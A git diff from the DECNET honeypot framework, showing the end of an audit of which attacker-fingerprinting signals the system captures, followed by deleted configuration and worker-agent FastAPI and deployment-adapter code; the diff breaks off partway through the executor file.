| TERM | partial | SSH pty-req, server-readable | No syslog emission, no DB | Patch SSH syslog bridge to emit term= | V2 |
|
||||
| LANG/LC_ALL | n/a | Server locale, not attacker-controlled | Not visible from server vantage | Defer (not capturable) | defer |
|
||||
| SSH client version | partial | TCP stream (plaintext banner before TLS) | Sniffer doesn't parse SSH banners; only TLS fingerprints | Extend sniffer to extract SSH banner from TCP stream | v1 blocker |
|
||||
| Terminal size (COLS×ROWS) | not_captured | SSH pty-req extension | Requires protocol interception or sshd patch | Patch sshd to log pty-req | V2 |
|
||||
| **Keyboard/Human** |
|
||||
| Per-keystroke timing | partial | Asciinema "i" events with t timestamps | Files on disk, not ingested to DB | Implement SessionProfile table + ingest job | v1 blocker |
|
||||
| Control-character stream | partial | Asciinema keystroke bytes | Same as above (files only) | Same as above | v1 blocker |
|
||||
| Inter-command think time | not_captured | Requires prompt detection | Heuristic (line ending in $/#) not implemented | Post-hoc: regex + gap detection over asciinema | V2 |
|
||||
| Pause before sensitive cmd | not_captured | Would be in asciinema timing | Requires command-line parsing + gap detection | Off-line analysis of asciinema | V2 |
|
||||
| Command n-grams | partial | Attacker.commands (generic list) | Per-session structure missing | Parse asciinema I/O; store in SessionProfile | V2 |
|
||||
| Flag preferences | not_captured | Asciinema input has typed flags | No parsing or normalization | Regex-parse and canonicalize flags from asciinema | V2 |
|
||||
| Typo patterns | not_captured | Raw keystroke sequence in asciinema "i" | Requires keystroke-by-keystroke reconstruction | Parse "i" events with backspace markers; reconstruct line state | V2 |
|
||||
| Editor choice | partial | Attacker.commands shows editor launch | No aggregation or time-in-editor | Count editor invocations; store preference in SessionProfile | V2 |
|
||||
| Shell history usage | partial | Command input shows !, ^, !! | No parsing for history operators | Regex-scan for shell history syntax; count | V2 |
|
||||
| **SSH Transport** |
|
||||
| HASSH/HASSHServer | captured | Prober (hassh.py); Attacker.fingerprints | ✓ (hash + raw algorithm strings in syslog) | Already done | — |
|
||||
| KEX algorithm order | partial | Syslog event kex_algorithms= field | Not persisted to DB (only in syslog) | Add AttackerBehavior.kex_order_raw (MEDIUMTEXT, JSON) | v1 blocker |
|
||||
| Public key comment | not_captured | SSH wire format (auth_pubkey) | Requires server-side auth hook | Patch sshd to emit auth_pubkey_comment event | V2 |
|
||||
| Private key type | partial | SSH wire format (auth algorithm OID) | Encrypted after KEX; needs sshd hook | Patch sshd to emit auth_key_type event | V2 |
|
||||
| Agent forwarding? | not_captured | SSH extension negotiation (encrypted) | Requires sshd instrumentation | Patch sshd to detect ssh-agent@openssh.com | V2 |
|
||||
| Channel multiplexing | partial | SSH service logs commands separately | No channel state machine | Instrument sshd SSH_MSG_CHANNEL_OPEN events | V2 |
|
||||
| SSH_CLIENT env vars | captured | Server sets automatically; queryable via shell | No automatic logging | Patch sshd PAM to emit SSH_CLIENT on auth | V2 |
|
||||
| **Network/Transport** |
|
||||
| TCP timestamp skew | partial | PCAP + sniffer has has_timestamps flag | Only boolean; not timestamp values | Extract timestamp seq numbers in sniffer | V2 |
|
||||
| TCP ISN generator | not_captured | PCAP SYN seq field | No per-connection ISN logging | Log syn_seq in tcp_syn_fingerprint event | V2 |
|
||||
| TCP options ordering | partial | Sniffer extracts options_sig signature | Aggregated string; no raw order per-packet | Extend tcp_fingerprint JSON with raw options list | v1 improvement |
|
||||
| Initial congestion window | not_captured | Would require per-packet ACK analysis | Not tracked in sniffer | Extend tcp_flow_timing to include payload sizes list | V2 |
|
||||
| Retransmit timing+backoff | partial | Sniffer counts retransmits; no timing | RTO/backoff timing not logged | Extend event to include RTO deltas | V2 |
|
||||
| MTU/path-MTU discovery | partial | MSS in TCP SYN; byte counts per flow | No ICMP fragmentation-needed events | Add ICMP processing; correlate with TCP flows | V2 |
|
||||
| Packet pacing (μs) | not_captured | Sniffer uses millisecond granularity | Needs PCAP hardware timestamps or OS hooks | Upgrade to sub-millisecond timing | V2+ |
|
||||
| Window scaling | captured | TCP fingerprint; wscale in AttackerBehavior | ✓ queryable | — | — |
|
||||
| ECN negotiation | not_captured | TCP SYN flags (CWR/ECE) + options | Not extracted from TCP header | Extend TCP fingerprint to parse ECN bits | V2 |
|
||||
| **L7 (TLS/HTTP)** |
|
||||
| TLS fingerprint (JA3/JA4) | captured | Sniffer fingerprint.py; Attacker.fingerprints | ✓ hashes stored + syslog | Already done | — |
|
||||
| HTTP/2 SETTINGS order | not_captured | Encrypted inside TLS | Passive inspection not viable | Defer (not capturable) | defer |
|
||||
| HTTP/2 prioritization | not_captured | Encrypted | Not capturable | defer | defer |
|
||||
| HTTP header ordering | not_captured | Encrypted; requires service logging | Service doesn't log raw headers | Patch HTTP service to log header order | V2 |
|
||||
| Cookie handling | not_captured | Requires HTTP state machine | Not tracked | Add cookie jar logging to HTTP service | V2 |
|
||||
| **Aggregated/Derived** |
|
||||
| Time-of-day distribution | partial | Timestamps on all events | No aggregation table | Batch job: hour-of-day histogram → AttackerAggregate | V2 |
|
||||
| Session duration dist | partial | SessionProfile would have duration | No SessionProfile table yet | Implement SessionProfile + duration stats | V2 |
|
||||
| Recon-to-action ratio | partial | AttackerBehavior.phase_sequence | No per-attacker ratio column | Compute ratio in profiler; store in AttackerAggregate | V2 |
|
||||
| Lateral movement style | not_captured | Correlation engine has traversal path | No traversal pattern analysis | Extend engine to compute dwell time + fan-out metrics | V2 |
|
||||
| Persistence-first vs. exfil | not_captured | No persistence event taxonomy | Needs event-type classification | Add PERSISTENCE_EVENT_TYPES; compute timings | V2 |
|
||||
| Tool-chain ordering | partial | tool_guesses list exists; unordered | No temporal ordering | Sort by first-event timestamp; build transition graph | V2 |
|
||||
| Error-response psych | not_captured | No success/failure event tagging | Requires per-command outcome tracking | Extend service events with status=success/failure | V2 |
|
||||
|
||||
---
|
||||
|
||||
## Pre-v1 Capture Gaps (Actionable, Blocky)
|
||||
|
||||
**Only tackle these if the signal is committed to the v1 roadmap:**
|
||||
|
||||
1. **KEX algorithm ordering** (ssh-transport)
|
||||
- **Action**: Add `AttackerBehavior.kex_order_raw` (MEDIUMTEXT, JSON list of algorithm strings).
|
||||
- **Effort**: 2 hrs (schema + sniffer event parser + profiler aggregator).
|
||||
- **Blocker?**: Only if roadmap demands full KEX analysis (currently only HASSH hash is promised).
|
||||
|
||||
2. **Per-keystroke timing ingestion** (keyboard/human)
|
||||
- **Action**: Create `SessionProfile` table (design in DEVELOPMENT_V2.md); stub write path with all NULLs.
|
||||
- **Effort**: 4 hrs (schema + migration + DAL).
|
||||
- **Blocker?**: Yes, if keystroke dynamics is v1 roadmap. Data exists on disk but is not queryable.
|
||||
|
||||
3. **SSH client banner capture** (ssh-transport)
|
||||
- **Action**: Extend sniffer to parse SSH banners from TCP stream before TLS; emit ssh_client_hello event.
|
||||
- **Effort**: 3 hrs (TCP stream parser + sniffer integration).
|
||||
- **Blocker?**: Yes, if full SSH client profiling is v1 roadmap (currently only server banner via HASSH).
|
||||
|
||||
4. **TCP options raw extraction** (network/transport)
|
||||
- **Action**: Extend `tcp_fingerprint` JSON to include raw options list (not just signature string).
|
||||
- **Effort**: 1 hr (minimal schema change + sniffer parser).
|
||||
- **Blocker?**: No (options_sig is good enough for current p0f-style fingerprinting; nice-to-have).
|
||||
|
||||
---
|
||||
|
||||
## Non-Capturable Signals (Explicit Deferral)
|
||||
|
||||
These require vantage-point changes or are architecturally infeasible:
|
||||
|
||||
| Signal | Why | Vantage Point Needed |
|
||||
|--------|-----|----------------------|
|
||||
| LANG / LC_ALL | Server locale is fixed; attacker's client locale invisible over SSH | Client-side instrumentation |
|
||||
| HTTP/2 SETTINGS frame order | Encrypted inside TLS stream | Server-side decryption or key log |
|
||||
| HTTP/2 stream prioritization | Encrypted | Server-side decryption |
|
||||
| Initial congestion window (CWND) | Requires detailed TCP ACK-clock tracking | Per-packet sniffer instrumentation |
|
||||
| Packet pacing (μs resolution) | Requires hardware-timestamped PCAP or kernel hooks | OS-level instrumentation |
|
||||
| Hold time / pressure / velocity (typing biometrics) | Not on SSH wire | Client-side TLS instrumentation |
|
||||
|
||||
---
|
||||
|
||||
## Summary for v1 Release
|
||||
|
||||
**Ship with these (already captured, queryable)**:
|
||||
- HASSH/HASSHServer ✓
|
||||
- JA3/JA3S/JA4/JA4S ✓
|
||||
- TLS session resumption ✓
|
||||
- TCP fingerprint (window, wscale, mss, options_sig) ✓
|
||||
- Behavioral timing stats (mean/median/stdev IAT) ✓
|
||||
- Phase sequencing (recon_end, exfil_start) ✓
|
||||
- Tool attribution (beacon timing + headers) ✓
|
||||
|
||||
**Data exists on disk, not queryable (v1 deferral acceptable)**:
|
||||
- Per-keystroke timing (asciinema day-shards) — needs SessionProfile ingestion job
|
||||
- SSH client banner (TCP stream) — needs sniffer enhancement
|
||||
- KEX algorithm order (syslog) — needs AttackerBehavior.kex_order_raw column
|
||||
|
||||
**Requires infrastructure changes (v2+)**:
|
||||
- Lateral movement graph analysis
|
||||
- HTTP header order + cookie jar behavior
|
||||
- Persistence-first vs. exfil-first classification
|
||||
- Error-response psychology
|
||||
- Chronotyping + session duration distribution
|
||||
|
||||
---
|
||||
|
||||
## Federation & Cross-Operator Gossip (v2 Implications)
|
||||
|
||||
The `SessionProfile` schema (table, schema_version field, numeric features) is designed to be the federation wire format. **No changes needed for v1**, but ensure schema_version is in the table definition from day one so gossip compatibility is straightforward in v2.
|
||||
|
||||
---
|
||||
|
||||
## Appendices
|
||||
|
||||
### A. Code Paths Audited
|
||||
|
||||
- `decnet/sniffer/fingerprint.py` — TLS + TCP fingerprinting engine
|
||||
- `decnet/services/ssh.py` — SSH service config + artifact paths
|
||||
- `decnet/prober/hassh.py` — HASSHServer computation
|
||||
- `decnet/web/db/models.py` — SQL schema (Attacker, AttackerBehavior, etc.)
|
||||
- `decnet/profiler/behavioral.py` — Timing + tool attribution
|
||||
- `decnet/correlation/parser.py` — RFC 5424 syslog ingestion
|
||||
- `decnet/templates/ssh/` — Session recording (asciinema), syslog bridge, capture.sh
|
||||
|
||||
### B. Storage Destinations Verified
|
||||
|
||||
- **Database**: SQLite/MySQL tables (Attacker, AttackerBehavior, Bounty, Log)
|
||||
- **Syslog**: RFC 5424 events (parsed by correlation engine, optionally piped to ELK)
|
||||
- **Disk**: Asciinema day-shards (`/var/lib/decnet/session_recordings/`), raw PCAP (retention TBD)
|
||||
- **Memory**: Sniffer state (sessions, flows, dedup cache) — lost on restart unless replayed from PCAP
|
||||
|
||||
### C. Roadmap Cross-Reference
|
||||
|
||||
- DEVELOPMENT.md lines 48–133: Attacker Intelligence Collection (TLS, behavioral, protocol fingerprinting, network topology, geolocation, service-level, aggregated).
|
||||
- `[x]` JA3/JA3S, JA4+, JARM, session resumption, TCP window/scaling, retransmits, beaconing, data exfil timing, HASSH/HASSHServer, HTTP/2 fingerprint, TLS session resumption, TTL values (partial), TCP stack fingerprinting.
|
||||
- `[ ]` (not v1): ISN patterns, HTTP header ordering, QUIC, DNS, IPv6/mDNS leakage, geolocation, service-level commands, credential reuse, payload signatures.
|
||||
|
||||
- DEVELOPMENT_V2.md: Keystroke dynamics, session profiling, federation.
|
||||
- SessionProfile schema (lines 71–104) — not yet implemented; ready-to-implement design.
|
||||
- Correlation via simhash (lines 50–56) — digraph rhythm fingerprinting.
|
||||
|
||||
---
|
||||
|
||||
1000
api-audit.md
1000
api-audit.md
File diff suppressed because it is too large
Load Diff
@@ -1,64 +0,0 @@
|
||||
; /etc/decnet/decnet.ini — DECNET host configuration
|
||||
;
|
||||
; Copy to /etc/decnet/decnet.ini and edit. Values here seed os.environ at
|
||||
; CLI startup via setdefault() — real env vars still win, so you can
|
||||
; override any value on the shell without editing this file.
|
||||
;
|
||||
; A missing file is fine; every daemon has sensible defaults. The main
|
||||
; reason to use this file is to skip typing the same flags on every
|
||||
; `decnet` invocation and to pin a host's role via `mode`.
|
||||
|
||||
[decnet]
|
||||
; mode = agent | master
|
||||
; agent — worker host (runs `decnet agent`, `decnet forwarder`, `decnet updater`).
|
||||
; Master-only commands (api, swarmctl, swarm, deploy, teardown, ...)
|
||||
; are hidden from `decnet --help` and refuse to run.
|
||||
; master — central server (runs `decnet api`, `decnet web`, `decnet swarmctl`,
|
||||
; `decnet listener`). All commands visible.
|
||||
mode = agent
|
||||
|
||||
; disallow-master = true (default when mode=agent)
|
||||
; Set to false for hybrid dev hosts that legitimately run both roles.
|
||||
disallow-master = true
|
||||
|
||||
; log-directory — root for DECNET's per-component logs. Systemd units set
|
||||
; DECNET_SYSTEM_LOGS=<log-directory>/decnet.<component>.log so agent, forwarder,
|
||||
; and engine each get their own file. The forwarder tails decnet.log.
|
||||
log-directory = /var/log/decnet
|
||||
|
||||
|
||||
; ─── Agent-only settings (read when mode=agent) ───────────────────────────
|
||||
[agent]
|
||||
; Where the master's syslog-TLS listener lives. DECNET_SWARM_MASTER_HOST.
|
||||
master-host = 192.168.1.50
|
||||
; Master listener port (RFC 5425 default 6514). DECNET_SWARM_SYSLOG_PORT.
|
||||
swarm-syslog-port = 6514
|
||||
; Bind address/port for this worker's agent API (mTLS).
|
||||
agent-port = 8765
|
||||
; Cert bundle dir — must contain ca.crt, worker.crt, worker.key from enroll.
|
||||
; DECNET_AGENT_DIR — honored by the forwarder child as well.
|
||||
agent-dir = /home/anti/.decnet/agent
|
||||
; Updater cert bundle (required for `decnet updater`).
|
||||
updater-dir = /home/anti/.decnet/updater
|
||||
|
||||
|
||||
; ─── Master-only settings (read when mode=master) ─────────────────────────
|
||||
[master]
|
||||
; Main API (REST for the React dashboard). DECNET_API_HOST / _PORT.
|
||||
api-host = 0.0.0.0
|
||||
api-port = 8000
|
||||
; React dev-server dashboard (`decnet web`). DECNET_WEB_HOST / _PORT.
|
||||
web-host = 0.0.0.0
|
||||
web-port = 8080
|
||||
; Swarm controller (master-internal). DECNET_SWARMCTL_HOST isn't exposed
|
||||
; under that name today — this block is the forward-compatible spelling.
|
||||
; swarmctl-host = 127.0.0.1
|
||||
; swarmctl-port = 8770
|
||||
; Syslog-over-TLS listener bind address and port. DECNET_LISTENER_HOST and
|
||||
; DECNET_SWARM_SYSLOG_PORT. The listener is auto-spawned by `decnet swarmctl`.
|
||||
listener-host = 0.0.0.0
|
||||
swarm-syslog-port = 6514
|
||||
; Master CA dir (for enroll / swarm cert issuance).
|
||||
; ca-dir = /home/anti/.decnet/ca
|
||||
; JWT secret for the web API. MUST be set; 32+ bytes. Keep out of git.
|
||||
; jwt-secret = REPLACE_ME_WITH_A_32_BYTE_SECRET
|
||||
@@ -1,12 +0,0 @@
|
||||
"""DECNET — honeypot deception-network framework.
|
||||
|
||||
This __init__ runs once, on the first `import decnet.*`. It seeds
|
||||
os.environ from /etc/decnet/decnet.ini (if present) so that later
|
||||
module-level reads in decnet.env pick up the INI values as if they had
|
||||
been exported by the shell. Real env vars always win via setdefault().
|
||||
|
||||
Kept minimal on purpose — any heavier work belongs in a submodule.
|
||||
"""
|
||||
from decnet.config_ini import load_ini_config as _load_ini_config
|
||||
|
||||
_load_ini_config()
|
||||
|
||||
@@ -1,7 +0,0 @@
|
||||
"""DECNET worker agent — runs on every SWARM worker host.
|
||||
|
||||
Exposes an mTLS-protected FastAPI service the master's SWARM controller
|
||||
calls to deploy, mutate, and tear down deckies locally. The agent reuses
|
||||
the existing `decnet.engine.deployer` code path unchanged, so a worker runs
|
||||
deckies the same way `decnet deploy --mode unihost` does today.
|
||||
"""
|
||||
@@ -1,320 +0,0 @@
|
||||
"""Worker-side FastAPI app.
|
||||
|
||||
Protected by mTLS at the ASGI/uvicorn transport layer: uvicorn is started
|
||||
with ``--ssl-ca-certs`` + ``--ssl-cert-reqs 2`` (CERT_REQUIRED), so any
|
||||
client that cannot prove a cert signed by the DECNET CA is rejected before
|
||||
reaching a handler. Once past the TLS handshake, all peers are trusted
|
||||
equally (the only entity holding a CA-signed cert is the master
|
||||
controller).
|
||||
|
||||
Endpoints mirror the existing unihost CLI verbs:
|
||||
|
||||
* ``POST /deploy`` — body: serialized ``DecnetConfig``
|
||||
* ``POST /teardown`` — body: optional ``{"decky_id": "..."}``
|
||||
* ``POST /mutate`` — body: ``{"decky_id": "...", "services": [...]}``
|
||||
* ``GET /status`` — deployment snapshot
|
||||
* ``GET /health`` — liveness probe, does NOT require mTLS? No — mTLS
|
||||
still required; master pings it with its cert.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
import pathlib
|
||||
from contextlib import asynccontextmanager
|
||||
from typing import Any, Optional
|
||||
|
||||
from fastapi import FastAPI, HTTPException
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
import contextlib
|
||||
|
||||
from decnet.agent import executor as _exec
|
||||
from decnet.agent import heartbeat as _heartbeat
|
||||
from decnet.agent import topology_ops as _topology_ops
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.bus.publish import run_health_heartbeat
|
||||
from decnet.swarm.pki import DEFAULT_AGENT_DIR
|
||||
from decnet.agent.topology_store import AlreadyApplied, TopologyStore
|
||||
from decnet.config import DecnetConfig
|
||||
from decnet.logging import get_logger
|
||||
from decnet.topology.validate import ValidationError
|
||||
|
||||
log = get_logger("agent.app")
|
||||
|
||||
|
||||
def _resolve_agent_dir() -> pathlib.Path:
|
||||
env = os.environ.get("DECNET_AGENT_DIR")
|
||||
if env:
|
||||
return pathlib.Path(env)
|
||||
system = pathlib.Path("/etc/decnet/agent")
|
||||
if system.exists():
|
||||
return system
|
||||
return DEFAULT_AGENT_DIR
|
||||
|
||||
|
||||
# Module-level singleton. Created lazily on first use so tests can
|
||||
# monkeypatch DECNET_AGENT_DIR before the store binds to a path.
|
||||
_topology_store: Optional[TopologyStore] = None
|
||||
|
||||
|
||||
def _store() -> TopologyStore:
|
||||
global _topology_store
|
||||
if _topology_store is None:
|
||||
_topology_store = TopologyStore(_resolve_agent_dir() / "topology.db")
|
||||
return _topology_store
|
||||
|
||||
|
||||
_collector_task: Optional[asyncio.Task] = None
|
||||
|
||||
|
||||
def _ensure_collector_started() -> None:
|
||||
"""Spawn the log collector on demand — called from /topology/apply
|
||||
after a successful materialise. We must NOT start this in the
|
||||
lifespan hook: the agent's boot invariant is "never touch docker
|
||||
until master tells us to" (see tests/swarm/test_agent_no_auto_restore.py).
|
||||
|
||||
The collector watches ``decnet.topology.service=true`` labels via
|
||||
docker events, writing RFC 5424 lines to ``DECNET_AGENT_LOG_FILE``
|
||||
which the forwarder ships to the master over syslog-TLS. Idempotent:
|
||||
subsequent calls while the task is still running are no-ops.
|
||||
"""
|
||||
global _collector_task
|
||||
if _collector_task is not None and not _collector_task.done():
|
||||
return
|
||||
from decnet.env import DECNET_AGENT_LOG_FILE
|
||||
|
||||
try:
|
||||
from decnet.collector.worker import log_collector_worker
|
||||
except Exception: # noqa: BLE001 — docker may be unavailable on dev
|
||||
log.warning(
|
||||
"agent log collector not starting — collector worker import failed",
|
||||
exc_info=True,
|
||||
)
|
||||
return
|
||||
_collector_task = asyncio.create_task(
|
||||
log_collector_worker(DECNET_AGENT_LOG_FILE),
|
||||
name="agent-log-collector",
|
||||
)
|
||||
log.info("agent log collector started log_file=%s", DECNET_AGENT_LOG_FILE)
|
||||
|
||||
|
||||
_bus_heartbeat_task: Optional[asyncio.Task] = None
|
||||
|
||||
|
||||
@asynccontextmanager
|
||||
async def _lifespan(app: FastAPI):
|
||||
# Best-effort: if identity/bundle plumbing isn't configured (e.g. dev
|
||||
# runs or non-enrolled hosts), heartbeat.start() is a silent no-op.
|
||||
_heartbeat.start()
|
||||
|
||||
# Host-local bus heartbeat (system.agent.health). Separate channel
|
||||
# from the mTLS master-facing heartbeat above; this one lets peers on
|
||||
# the same host (dashboard, updater) see the agent is alive without
|
||||
# hitting its HTTPS endpoint. Bus-disabled path is a no-op loop.
|
||||
bus = None
|
||||
try:
|
||||
bus = get_bus(client_name="agent")
|
||||
await bus.connect()
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning("agent: bus unavailable, skipping health heartbeat: %s", exc)
|
||||
bus = None
|
||||
|
||||
global _bus_heartbeat_task
|
||||
_bus_heartbeat_task = asyncio.create_task(
|
||||
run_health_heartbeat(bus, "agent"),
|
||||
name="agent-bus-heartbeat",
|
||||
)
|
||||
|
||||
try:
|
||||
yield
|
||||
finally:
|
||||
await _heartbeat.stop()
|
||||
if _bus_heartbeat_task is not None:
|
||||
_bus_heartbeat_task.cancel()
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await _bus_heartbeat_task
|
||||
_bus_heartbeat_task = None
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
global _collector_task
|
||||
if _collector_task is not None and not _collector_task.done():
|
||||
_collector_task.cancel()
|
||||
try:
|
||||
await _collector_task
|
||||
except (asyncio.CancelledError, Exception): # noqa: BLE001
|
||||
pass
|
||||
_collector_task = None
|
||||
global _topology_store
|
||||
if _topology_store is not None:
|
||||
_topology_store.close()
|
||||
_topology_store = None
|
||||
|
||||
|
||||
app = FastAPI(
|
||||
title="DECNET SWARM Agent",
|
||||
version="0.1.0",
|
||||
docs_url=None, # no interactive docs on worker — narrow attack surface
|
||||
redoc_url=None,
|
||||
openapi_url=None,
|
||||
lifespan=_lifespan,
|
||||
responses={
|
||||
400: {"description": "Malformed request body"},
|
||||
500: {"description": "Executor error"},
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
# ------------------------------------------------------------------ schemas
|
||||
|
||||
class DeployRequest(BaseModel):
|
||||
config: DecnetConfig = Field(..., description="Full DecnetConfig to materialise on this worker")
|
||||
dry_run: bool = False
|
||||
no_cache: bool = False
|
||||
|
||||
|
||||
class TeardownRequest(BaseModel):
|
||||
decky_id: Optional[str] = None
|
||||
|
||||
|
||||
class MutateRequest(BaseModel):
|
||||
decky_id: str
|
||||
services: list[str]
|
||||
|
||||
|
||||
# ------------------------------------------------------------------ routes
|
||||
|
||||
@app.get("/health")
|
||||
async def health() -> dict[str, str]:
|
||||
return {"status": "ok"}
|
||||
|
||||
|
||||
@app.get("/status")
|
||||
async def status() -> dict:
|
||||
return await _exec.status()
|
||||
|
||||
|
||||
@app.post(
|
||||
"/deploy",
|
||||
responses={500: {"description": "Deployer raised an exception materialising the config"}},
|
||||
)
|
||||
async def deploy(req: DeployRequest) -> dict:
|
||||
try:
|
||||
await _exec.deploy(req.config, dry_run=req.dry_run, no_cache=req.no_cache)
|
||||
except Exception as exc:
|
||||
log.exception("agent.deploy failed")
|
||||
raise HTTPException(status_code=500, detail=str(exc)) from exc
|
||||
return {"status": "deployed", "deckies": len(req.config.deckies)}
|
||||
|
||||
|
||||
@app.post(
|
||||
"/teardown",
|
||||
responses={500: {"description": "Teardown raised an exception"}},
|
||||
)
|
||||
async def teardown(req: TeardownRequest) -> dict:
|
||||
try:
|
||||
await _exec.teardown(req.decky_id)
|
||||
except Exception as exc:
|
||||
log.exception("agent.teardown failed")
|
||||
raise HTTPException(status_code=500, detail=str(exc)) from exc
|
||||
return {"status": "torn_down", "decky_id": req.decky_id}
|
||||
|
||||
|
||||
@app.post(
|
||||
"/self-destruct",
|
||||
responses={500: {"description": "Reaper could not be scheduled"}},
|
||||
)
|
||||
async def self_destruct() -> dict:
|
||||
"""Stop all DECNET services on this worker and delete the install
|
||||
footprint. Called by the master during decommission. Logs under
|
||||
/var/log/decnet* are preserved. Fire-and-forget — returns 202 before
|
||||
the reaper starts deleting files."""
|
||||
try:
|
||||
await _exec.self_destruct()
|
||||
except Exception as exc:
|
||||
log.exception("agent.self_destruct failed")
|
||||
raise HTTPException(status_code=500, detail=str(exc)) from exc
|
||||
return {"status": "self_destruct_scheduled"}
|
||||
|
||||
|
||||
# ------------------------------------------------------- topology endpoints
|
||||
|
||||
|
||||
class ApplyTopologyRequest(BaseModel):
|
||||
hydrated: dict[str, Any] = Field(
|
||||
..., description="Hydrated topology dict from master.persistence.hydrate()"
|
||||
)
|
||||
version_hash: str = Field(
|
||||
..., description="Master's canonical_hash(hydrated); must match ours"
|
||||
)
|
||||
|
||||
|
||||
class TeardownTopologyRequest(BaseModel):
|
||||
topology_id: str = Field(..., description="Topology UUID to dismantle")
|
||||
|
||||
|
||||
@app.post(
|
||||
"/topology/apply",
|
||||
responses={
|
||||
400: {"description": "Malformed hydrated topology or hash mismatch"},
|
||||
409: {"description": "A different topology is already applied"},
|
||||
500: {"description": "Docker or compose raised while applying"},
|
||||
},
|
||||
)
|
||||
async def topology_apply(req: ApplyTopologyRequest) -> dict:
|
||||
store = _store()
|
||||
try:
|
||||
await _topology_ops.apply(req.hydrated, req.version_hash, store)
|
||||
except _topology_ops.HashMismatch as exc:
|
||||
raise HTTPException(status_code=400, detail=str(exc)) from exc
|
||||
except ValidationError as exc:
|
||||
raise HTTPException(status_code=400, detail=str(exc)) from exc
|
||||
except AlreadyApplied as exc:
|
||||
raise HTTPException(status_code=409, detail=str(exc)) from exc
|
||||
except Exception as exc:
|
||||
log.exception("agent.topology_apply failed")
|
||||
topology_id = (req.hydrated.get("topology") or {}).get("id")
|
||||
if topology_id:
|
||||
try:
|
||||
store.record_error(
|
||||
str(topology_id), str(exc)[:500], hydrated=req.hydrated,
|
||||
)
|
||||
except Exception: # noqa: BLE001 — don't mask original failure
|
||||
log.exception("failed to record apply error")
|
||||
raise HTTPException(status_code=500, detail=str(exc)) from exc
|
||||
_ensure_collector_started()
|
||||
return {"status": "applied", "version_hash": req.version_hash}
|
||||
|
||||
|
||||
@app.post(
|
||||
"/topology/teardown",
|
||||
responses={500: {"description": "Docker or compose raised while tearing down"}},
|
||||
)
|
||||
async def topology_teardown(req: TeardownTopologyRequest) -> dict:
|
||||
try:
|
||||
await _topology_ops.teardown(req.topology_id, _store())
|
||||
except Exception as exc:
|
||||
log.exception("agent.topology_teardown failed")
|
||||
raise HTTPException(status_code=500, detail=str(exc)) from exc
|
||||
return {"status": "torn_down", "topology_id": req.topology_id}
|
||||
|
||||
|
||||
@app.get("/topology/state")
|
||||
async def topology_state() -> dict:
|
||||
return _topology_ops.state(_store())
|
||||
|
||||
|
||||
@app.post(
|
||||
"/mutate",
|
||||
responses={501: {"description": "Worker-side mutate not yet implemented"}},
|
||||
)
|
||||
async def mutate(req: MutateRequest) -> dict:
|
||||
# TODO: implement worker-side mutate. Currently the master performs
|
||||
# mutation by re-sending a full /deploy with the updated DecnetConfig;
|
||||
# this avoids duplicating mutation logic on the worker for v1. When
|
||||
# ready, replace the 501 with a real redeploy-of-a-single-decky path.
|
||||
raise HTTPException(
|
||||
status_code=501,
|
||||
detail="Per-decky mutate is performed via /deploy with updated services",
|
||||
)
|
||||
@@ -1,223 +0,0 @@
|
||||
"""Thin adapter between the agent's HTTP endpoints and the existing
|
||||
``decnet.engine.deployer`` code path.
|
||||
|
||||
Kept deliberately small: the agent does not re-implement deployment logic,
|
||||
it only translates a master RPC into the same function calls the unihost
|
||||
CLI already uses. Everything runs in a worker thread (the deployer is
|
||||
blocking) so the FastAPI event loop stays responsive.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
from ipaddress import IPv4Network
|
||||
from typing import Any
|
||||
|
||||
from decnet.engine import deployer as _deployer
|
||||
from decnet.config import DecnetConfig, load_state, clear_state
|
||||
from decnet.logging import get_logger
|
||||
from decnet.network import (
|
||||
allocate_ips,
|
||||
detect_interface,
|
||||
detect_subnet,
|
||||
get_host_ip,
|
||||
)
|
||||
|
||||
log = get_logger("agent.executor")
|
||||
|
||||
|
||||
def _relocalize(config: DecnetConfig) -> DecnetConfig:
|
||||
"""Rewrite a master-built config to the worker's local network reality.
|
||||
|
||||
The master populates ``interface``/``subnet``/``gateway`` from its own
|
||||
box before dispatching, which blows up the deployer on any worker whose
|
||||
NIC name differs (common in heterogeneous fleets — master on ``wlp6s0``,
|
||||
worker on ``enp0s3``). We always re-detect locally; if the worker sits
|
||||
on a different subnet than the master, decky IPs are re-allocated from
|
||||
the worker's subnet so they're actually reachable.
|
||||
"""
|
||||
local_iface = detect_interface()
|
||||
local_subnet, local_gateway = detect_subnet(local_iface)
|
||||
local_host_ip = get_host_ip(local_iface)
|
||||
|
||||
updates: dict[str, Any] = {
|
||||
"interface": local_iface,
|
||||
"subnet": local_subnet,
|
||||
"gateway": local_gateway,
|
||||
}
|
||||
|
||||
master_net = IPv4Network(config.subnet, strict=False) if config.subnet else None
|
||||
local_net = IPv4Network(local_subnet, strict=False)
|
||||
if master_net is None or master_net != local_net:
|
||||
log.info(
|
||||
"agent.deploy subnet mismatch master=%s local=%s — re-allocating decky IPs",
|
||||
config.subnet, local_subnet,
|
||||
)
|
||||
fresh_ips = allocate_ips(
|
||||
subnet=local_subnet,
|
||||
gateway=local_gateway,
|
||||
host_ip=local_host_ip,
|
||||
count=len(config.deckies),
|
||||
)
|
||||
new_deckies = [d.model_copy(update={"ip": ip}) for d, ip in zip(config.deckies, fresh_ips)]
|
||||
updates["deckies"] = new_deckies
|
||||
|
||||
return config.model_copy(update=updates)
|
||||
|
||||
|
||||
async def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False) -> None:
|
||||
"""Run the blocking deployer off-loop. The deployer itself calls
|
||||
save_state() internally once the compose file is materialised."""
|
||||
log.info(
|
||||
"agent.deploy mode=%s deckies=%d interface=%s (incoming)",
|
||||
config.mode, len(config.deckies), config.interface,
|
||||
)
|
||||
if config.mode == "swarm":
|
||||
config = _relocalize(config)
|
||||
log.info(
|
||||
"agent.deploy relocalized interface=%s subnet=%s gateway=%s",
|
||||
config.interface, config.subnet, config.gateway,
|
||||
)
|
||||
await asyncio.to_thread(_deployer.deploy, config, dry_run, no_cache, False)
|
||||
|
||||
|
||||
async def teardown(decky_id: str | None = None) -> None:
|
||||
